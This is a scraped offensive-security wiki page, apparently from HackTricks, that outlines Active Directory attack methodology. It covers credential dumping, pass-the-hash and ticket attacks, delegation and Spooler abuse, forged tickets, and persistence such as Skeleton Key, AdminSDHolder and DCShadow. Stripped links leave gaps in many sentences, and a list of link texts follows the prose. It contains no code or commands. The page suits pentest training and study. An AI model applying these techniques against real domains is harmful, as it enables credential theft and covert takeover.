If you have compromised credentials or a session as a regular domain user and you have access with this user to any machine in the domain you should try to find your way to escalate privileges locally. This is because only with admin privileges you will be able to dump hashes of other users in memory (LSASS) and locally (SAM). There is a complete page in this book about and a . Also, don't forget to use .

Once you have obtained some credentials you could check if you have access to any machine using the win-rm service.

Hopefully you have managed to compromise some local admin account using , , , , , ... or . Then, its time to dump all the hashes in memory and locally.

Once you have the hash of a user, you can use it to impersonate it. You need to use some tool that will perform the NTLM authentication using that hash, or you could create a new sessionlogon and inject that hash inside the LSASS, so when any NTLM authentication is performed, that hash will be used. The last option is what mimikatz does. .

This attack aims to use the user NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over NTLM protocol. Therefore, this could be especially useful in networks where NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.

This attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner. .

If a user has privileges to access MSSQL instances, he could be able to use it to execute commands in the MSSQL host (if running as SA). Also, if a MSSQL instance is trusted (database link) by a different MSSQL instance. If the user has privileges over the trusted database, he is going to be able to use the trust relationship to execute queries also in the other instance. These trusts can be chained and at some point the user might be able to find a misconfigured database where he can execute commands. The links between databases work even across forest trusts.

If you find any Computer object with the attribute and you have domain privileges in the computer, you will be able to dump TGTs from memory of every users that logins onto the computer. So, if a Domain Admin logins onto the computer, you will be able to dump his TGT and impersonate him using . Thanks to constrained delegation you could even automatically compromise a Print Server (hopefully it will be a DC).

If a user or computer is allowed for "Constrained Delegation" it will be able to impersonate any user to access some services in a computer. Then, if you compromise the hash of this user/computer you will be able to impersonate any user (even domain admins) to access some services.

The compromised user could have some interesting privileges over some domain objects that could let you move laterally/escalate privileges.

If you can find any Spool service listening inside the domain, you may be able to abuse is to obtain new credentials and escalate privileges.

More information about . More information about.

Some of the techniques discussed before can be used for persistence. For example you could make a user vulnerable to or to .

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user (like privileged access to a computer).

The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all “protected groups” in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. By default, the ACL of this group is copied inside all the "protected groups". This is done to avoid intentional or accidental changes to these critical groups. However, if an attacker modifies the ACL of the group AdminSDHolder for example, giving full permissions to a regular user, this user will have full permissions on all the groups inside the protected group (in an hour). And if someone tries to delete this user from the Domain Admins (for example) in an hour or less, the user will be back in the group. .

There is a local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. ****

You could give some special permissions to a user over some specific domain objects that will let the user escalate privileges in the future.

The security descriptors are used to store the permissions an object have over an object. If you can just make a little change in the security descriptor of an object, you can obtain very interesting privileges over that object without needing to be member of a privileged group. .

Modify LSASS in memory to create a master password that will work for any account in the domain.

You can create you own SSP to capture in clear text the credentials used to access the machine. .

It registers a new Domain Controller in the AD and uses it to push attributes (SIDHistory, SPNs...) on specified objects without leaving any logs regarding the modifications. You need DA privileges and be inside the root domain. Note that if you use wrong data, pretty ugly logs will appear. ****

At a high level, a establishes the ability for users in one domain to authenticate to resources or act as a in another domain.

External – an implicitly non-transitive trust created between disparate domains. “” External trusts enforce SID filtering, a security protection covered later in this post.

Tree-root – an implicit two-way transitive trust between the forest root domain and the new tree root you’re adding. I haven’t encountered tree-root trusts too often, but from the , they’re created when you when you create a new domain tree in a forest. These are intra-forest trusts, and they while allowing the tree to have a separate domain name (instead of child.parent.com).

MIT – a trust with a non-Windows Kerberos domain. I hope to dive more into MIT trusts in the future.

They can be added as principals in an access control list, most interesting for us as principals in ACEs in a DACL. For more background on ACLs/DACLs/ACEs, check out the “” whitepaper.

Please, find some migrations against each technique in the description of the technique.

​

Support Hacktricks through github sponsors
💬
telegram group
🐦
@carlospolopm
https://github.com/carlospolop/hacktricks
https://techterms.com/definition/active_directory
Read this page if you still don't know how it works.
https://wadcoms.github.io/
printers could be very interesting targets
Pentesting Methodology
A more detailed guide on how to enumerate a SMB server can be found here.
A more detailed guide on how to enumerate LDAP can be found here.
impersonating services with Responder
fake UPnP services with evil-S
SDP
read this
https://github.com/insidetrust/statistically-likely-usernames
ASREPRoast
Password Spraying
traditional bruteforce
ASREPRoast
Password Spraying
BloodHound
enumerate the domain using pywerview
https://github.com/tomcarver16/ADSearch
in the Kerberoast page
local privilege escalation in Windows
checklist
WinPEAS
More information about how to use and abuse win-rm here.
More information about Over Pass the Hash/Pass the Key here.
More information about Pass the Ticket here
More information about this technique here.
ADS_UF_TRUSTED_FOR_DELEGATION
Pass the Ticket
More information about this technique here.
More information about this attacks and some constrains here.
More information about interesting privileges here.
More information about how to find a abuse Spooler services here.
DCSync attack can be found here
how to steal the NTDS.dit (Domain database) can be found here
ASREPRoast
Kerberoast
More information about Golden Ticket here.
More information about Silver Ticket here.
More information about AdminSDHolder Group here
More information about DSRM Credentials here.
More information about interesting privileges here.
More information about Security Descriptors here
More information about Skeleton Key here.
More information about DCShadow here.
domain trust
security principal
External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.
Microsoft documentation
preserve two-way transitivity
RFC4120-compliant
An ACE Up The Sleeve
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
More information about domain trusts in ired.team.
Learn more about how to protect credentials here.
https://github.com/samratashok/Deploy-Deception
https://github.com/JavelinNetworks/HoneypotBuster
Powershell script to do domain auditing automation
Python script to enumerate active directory
Python script to enumerate active directory
Buy me a coffee here
ASREPROast
Password Spraying
Kerberoast
Responder
EvilSSDP
escalating privileges locally
Read this page about different ways to obtain the hashes.
Enumerating
powershell for recon
use powerview
More information about Custom SSP here
Learn what is a SSP (Security Support Provider) here.
abusing the relay attack
Windows binaries from the CMD to perform a basic recon
More information about this attack and about how does NTLM works here